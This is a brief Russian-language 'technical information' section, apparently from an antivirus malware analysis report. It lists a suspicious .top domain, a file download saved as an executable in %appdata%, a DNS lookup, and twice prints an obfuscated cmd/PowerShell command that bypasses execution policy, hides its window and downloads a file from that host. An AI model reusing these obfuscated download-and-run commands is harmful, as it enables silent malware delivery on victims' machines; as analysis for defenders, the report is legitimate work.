Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Powe^rsHe^Ll^.e^XE^ -eXeCUti^OnPOli^C^Y^ byPa^s^S -NO^p^rOFil^E^ ^-wINDo^w^ST^y^lE^ hidDeN (nEW-^OBJeCt SY^St^EM.net.w^E^b^CLi^ENT)^.^DoWN^lOADfiLe('http://www.fapoergol.to...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "Powe^rsHe^Ll^.e^XE^ -eXeCUti^OnPOli^C^Y^ byPa^s^S -NO^p^rOFil^E^ ^-wINDo^w^ST^y^lE^ hidDeN (nEW-^OBJeCt SY^St^EM.net.w^E^b^CLi^ENT)^.^DoWN^lOADfiLe('http://www.fapoergol.to...' (со скрытым окном)